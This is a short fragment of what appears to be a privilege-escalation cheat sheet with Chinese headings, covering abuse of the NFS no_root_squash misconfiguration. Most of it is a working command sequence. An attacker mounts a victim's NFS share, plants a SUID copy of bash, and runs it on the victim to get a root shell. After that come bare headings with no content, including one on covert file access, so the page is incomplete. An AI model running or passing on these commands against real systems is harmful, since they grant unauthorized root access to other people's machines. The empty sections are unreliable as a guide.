NFS no_root_squash/no_all_squash misconfiguration PE
提权
远程利用
#Attacker, as root user
mkdir /tmp/pe
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe
cd /tmp/pe
cp /bin/bash .
chmod +s bash
#Victim
cd <SHAREDD_FOLDER>
./bash -p #ROOT shell本地利用
基本信息
编译库
进行利用
附加内容:NFShell 用于隐蔽文件访问
参考
最后更新于